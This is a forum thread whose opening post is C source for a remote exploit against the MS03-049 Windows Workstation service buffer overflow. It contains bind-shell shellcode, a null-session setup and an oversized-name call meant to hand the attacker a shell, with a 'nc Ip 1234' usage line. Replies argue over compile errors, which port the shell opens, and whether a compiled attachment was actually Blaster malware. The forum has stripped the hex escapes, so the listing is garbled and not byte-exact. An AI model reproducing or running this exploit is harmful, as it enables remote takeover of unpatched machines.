
Anarchy
#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>
//#include <winsock.h>


typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);


#define SIZE 2048

#pragma comment(lib,"mpr.lib")
//#pragma comment(lib,"netapi32.lib")
#pragma comment(lib,"Ws2_32.lib")
//#pragma comment(lib,"user32.lib")

/*
 * Payload buffer.  The author's own comment below describes it as a bind
 * shell with a definable listen port; nothing in this listing lets a reader
 * verify that, and the thread below disputes which port it actually opens.
 * NOTE(review): as reproduced on this page the forum has stripped the
 * backslash from every hex escape, so these literals are plain text, not the
 * intended byte values (the thread points this out).  main() copies
 * sizeof(shellcode) - 1 bytes of this array into its name buffer and
 * overwrites a 4-byte word at a fixed offset before the call.
 */
unsigned char shellcode[] =
/* bindshell no RPC crash, defineable spawn port */
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90xebx19x5ex31xc9x81xe9x89xff"
"xffxffx81x36x80xbfx32x94x81xeexfcxffxffxffxe2xf2"
"xebx05xe8xe2xffxffxffx03x53x06x1fx74x57x75x95x80"
"xbfxbbx92x7fx89x5ax1axcexb1xdex7cxe1xbex32x94x09"
"xf9x3ax6bxb6xd7x9fx4dx85x71xdaxc6x81xbfx32x1dxc6"
"xb3x5axf8xecxbfx32xfcxb3x8dx1cxf0xe8xc8x41xa6xdf"
"xebxcdxc2x88x36x74x90x7fx89x5axe6x7ex0cx24x7cxad"
"xbex32x94x09xf9x22x6bxb6xd7xddx5ax60xdfxdax8ax81"
"xbfx32x1dxc6xabxcdxe2x84xd7xf9x79x7cx84xdax9ax81"
"xbfx32x1dxc6xa7xcdxe2x84xd7xebx9dx75x12xdax6ax80"
"xbfx32x1dxc6xa3xcdxe2x84xd7x96x8exf0x78xdax7ax80"
"xbfx32x1dxc6x9fxcdxe2x84xd7x96x39xaex56xdax4ax80"
"xbfx32x1dxc6x9bxcdxe2x84xd7xd7xddx06xf6xdax5ax80"
"xbfx32x1dxc6x97xcdxe2x84xd7xd5xedx46xc6xdax2ax80"
"xbfx32x1dxc6x93x01x6bx01x53xa2x95x80xbfx66xfcx81"
"xbex32x94x7fxe9x2axc4xd0xefx62xd4xd0xffx62x6bxd6"
"xa3xb9x4cxd7xe8x5ax96x80xaex6ex1fx4cxd5x24xc5xd3"
"x40x64xb4xd7xecxcdxc2xa4xe8x63xc7x7fxe9x1ax1fx50"
"xd7x57xecxe5xbfx5axf7xedxdbx1cx1dxe6x8fxb1x78xd4"
"x32x0exb0xb3x7fx01x5dx03x7ex27x3fx62x42xf4xd0xa4"
"xafx76x6axc4x9bx0fx1dxd4x9bx7ax1dxd4x9bx7ex1dxd4"
"x9bx62x19xc4x9bx22xc0xd0xeex63xc5xeaxbex63xc5x7f"
"xc9x02xc5x7fxe9x22x1fx4cxd5xcdx6bxb1x40x64x98x0b"
"x77x65x6bxd6x93xcdxc2x94xeax64xf0x21x8fx32x94x80"
"x3axf2xecx8cx34x72x98x0bxcfx2ex39x0bxd7x3ax7fx89"
"x34x72xa0x0bx17x8ax94x80xbfxb9x51xdexe2xf0x90x80"
"xecx67xc2xd7x34x5exb0x98x34x77xa8x0bxebx37xecx83"
"x6axb9xdex98x34x68xb4x83x62xd1xa6xc9x34x06x1fx83"
"x4ax01x6bx7cx8cxf2x38xbax7bx46x93x41x70x3fx97x78"
"x54xc0xafxfcx9bx26xe1x61x34x68xb0x83x62x54x1fx8c"
"xf4xb9xcex9cxbcxefx1fx84x34x31x51x6bxbdx01x54x0b"
"x6ax6dxcaxddxe4xf0x90x80x2fxa2x04";


/*
 * Proof of concept for the MS03-049 Workstation service (wkssvc.dll) overflow,
 * per the usage text printed below.  What this listing visibly does:
 *   1. attaches a null session to \\<host>\ipc$ with WNetAddConnection2;
 *   2. loads netapi32 at runtime and resolves NetAddAlternateComputerName,
 *      falling back to NetValidateName;
 *   3. calls it with a SIZE-byte (2048) "name" buffer filled with 0x90,
 *      the payload array copied in at offset 0 and two 4-byte words written
 *      at fixed offsets.
 * Defender's notes: the observable trigger is an SMB null session followed
 * by a Workstation-service call carrying an oversized computer name (the
 * thread below reports an outgoing connection to the target on port 445);
 * the remedy is the MS03-049 update.  As reproduced on this page the forum
 * stripped the backslash from every hex escape, so none of the string
 * literals are byte-exact.  The try/catch near the end is C++ syntax, so
 * this must be built as C++ (the thread calls the file main.cpp).
 * Argument: argv[1] is the target host; returns 0, or 1 on a load failure.
 */
int main(int argc,char ** argv)
{
int ret=0;
HINSTANCE hInstance;
MYPROC procAddress;
char szBuffer[SIZE];
NETRESOURCE netResource;
int i=0;

/* Listener port the author intends the payload to use; folded into the
 * payload below.  The thread disputes which port actually results. */
unsigned short lportl=1234; /* drg */
char lport[5] = "x00xFFxFFx8b"; /* drg */

/* host is 30 bytes; hostipc and hostl are arrays of pointers whose storage
 * is reused as raw narrow/wide character buffers via casts. */
char host[30];
LPSTR hostipc[40];
LPWSTR hostl[60];
if(argc<2) {
printf("Windows Workstation ms03-049 wkksvc.dll buffer overflow
nbug discoveried by eEye,code by Hanabishi,shellcode by oc.192 n
Modified by sbaa(sbaa@163.net) 2003/11/14 ver 0.1n
Usage: %s IP n
nc Ip 1234n",argv[0]);
printf("");
return 0;
}
/* NOTE(review): unbounded sprintf of argv[1] into the 30-byte host[] and
 * into hostipc; an overlong argument overruns these locals. */
sprintf(host,"\\%s",argv[1]);
sprintf((char *)hostipc,"%s\ipc$",host);

/* Describe the IPC$ share to connect to (no local drive letter). */
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;
// "\\192.168.6.7\ipc$";



/* Empty user name and password: a null session.  Failure is only logged;
 * the early return is commented out, so execution continues regardless. */
ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
fprintf(stderr, "[-] WNetAddConnection2 failedn");
// return 1;
}


/* netapi32 is loaded at runtime rather than linked (see the commented-out
 * pragma at the top of the file). */
hInstance = LoadLibrary("netapi32");
if (hInstance == NULL)
{
fprintf(stderr, "[-] LoadLibrary failedn");
return 1;
}


/* Resolve the target API; both candidates share the MYPROC signature.
 * Absence of NetAddAlternateComputerName is taken as "not XP/2003". */
procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetAddAlternateComputerName (you are not xp(2003)) n");
// return 1;
procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
if (procAddress == NULL)
{
fprintf(stderr, "can't find NetValidateName!n");
return 1;
}
}


/* Fill the whole name buffer with 0x90 before laying the payload over it. */
memset(szBuffer, 0x90, sizeof(szBuffer));
/* Commented-out alternative: a cyclic byte pattern fill (unused). */
/*
for( i=0;i<SIZE-4;i=i+4)
{

if((i+i/256)%256!=0) memset(szBuffer+i,i+i/256,1);
if((i+1)%256!=0) memset(szBuffer+i+1,i+1,1);
if((i+2)%256!=0) memset(szBuffer+i+2,i+2,1);
if((i+3)%256!=0) memset(szBuffer+i+3,i+3,1);
}
*/
/* Network-order port into bytes 1-2 of lport, XOR the first 4 bytes with a
 * constant, then write them into the payload at offset 471-48.
 * NOTE(review): the long* reads/writes on a char[5] are a type-punning
 * (strict-aliasing/alignment) hazard; memcpy would be the defined form. */
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&shellcode[471-48],&lport,4);
/* sizeof(shellcode) - 1 excludes the literal's terminating NUL. */
memcpy(szBuffer, shellcode, sizeof(shellcode) - 1);


/* Two fixed 4-byte words at offsets 1851 and 2017 of the buffer; their
 * meaning is not established by this listing (the escapes are stripped). */
memcpy(szBuffer+1851,"x1bx4axfax7f",4);
memcpy(szBuffer+2017,"x1bx4axfax7f",4);

/* Ensure the buffer is NUL-terminated as a narrow string. */
szBuffer[SIZE-1]=0;

/* Widen the host name; the thread reports a compile error here because
 * the cast yields unsigned short* where wchar_t* is expected. */
MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);

/* C++ exception syntax: any exception raised by the call is swallowed. */
try{
ret = (procAddress)((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);

}

catch(...)
{

}

//ret=NetValidateName(hostl, szBuffer, NULL, NULL, 0);

/* Report the API's return value, then tear down the session (attempted
 * even if the connection above failed) and unload netapi32. */
printf("%dn",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hInstance);
return 0;
}
kevin007
I see blaster in the .exe

will try compiling the source code, possibly norton is just being too cautious - it doesn't look bad, prob just too similar to blaster in some ways

Edit:

Code compiling almost worked, a problem with the lport (and some with the text printout/hex, but they were simple to fix - the missing {code} brackets removed the \'s from the sploit ):
CODE

"main.cpp": E2034 Cannot convert 'unsigned short *' to 'wchar_t *' in function main(int,char * *) at line 148
"main.cpp": E2342 Type mismatch in parameter 'lpWideCharStr' (wanted 'wchar_t *', got 'unsigned short *') in function main(int,char * *) at line 148


This line has more of a problem, totally oblivious for that:
CODE
MultiByteToWideChar(CP_ACP, NULL, host, -1, (unsigned short*)hostl,60);


Didn't work on my 2k machine (what a surprise...), am gonna find a fresh xp to test it on
Anarchy
worm blaster?

ok,i compiled so many exploits
u dont believe me
ud better compile it by urself


http://www.security-corporation.com/downlo.../ms03-049-w2k.c
shorto85
Norton picked it up as blaster... can anyone verify this?
Littlelord
@Shorto85,
yes I can confirm this. But I assume that this is because the exploit is similar to the blaster and may be detected because of identical code parts

LL
enlightnr
LMAO if you think that its virus ridden you shouldnt be compiling dangerous things like this. Its best that you stay away for you own good before you get infected by Blaster! tongue.gif laugh.gif laugh.gif laugh.gif
Toilal
This shellcode opens a shell on the 4444 port. not 1234.
and don't we need to use \x90\x90\x90 in the shellcode, and not x90x90x90 ?
T3cHn0b0y
Doesnt work. Doesnt even attempt to make a connection to the remote ip.
Toilal
U need to paste the source in CODE tag on the forum, because it strips some characters, including this
CODE
\
Jurojin
QUOTE (T3cHn0b0y @ Nov 15 2003, 02:28 PM)
Doesnt work. Doesnt even attempt to make a connection to the remote ip.

Yes it does cuz I just tried it with my firewall enabled and there is an outgoing connection to the target host on port 445.
QuadMedic
it should spawn shell on 1234 and not 4444..do u scan for port 445 or 135?
ComSec
right i have removed the attachment....

can someone explain to me

was it a malicious intended file...or a genuine compiled mistake ?

is the compiled version the same as the code posted by Anarchy ?

and the same as on security-corp.... i aint got time to check it out ...am busy atm

thanks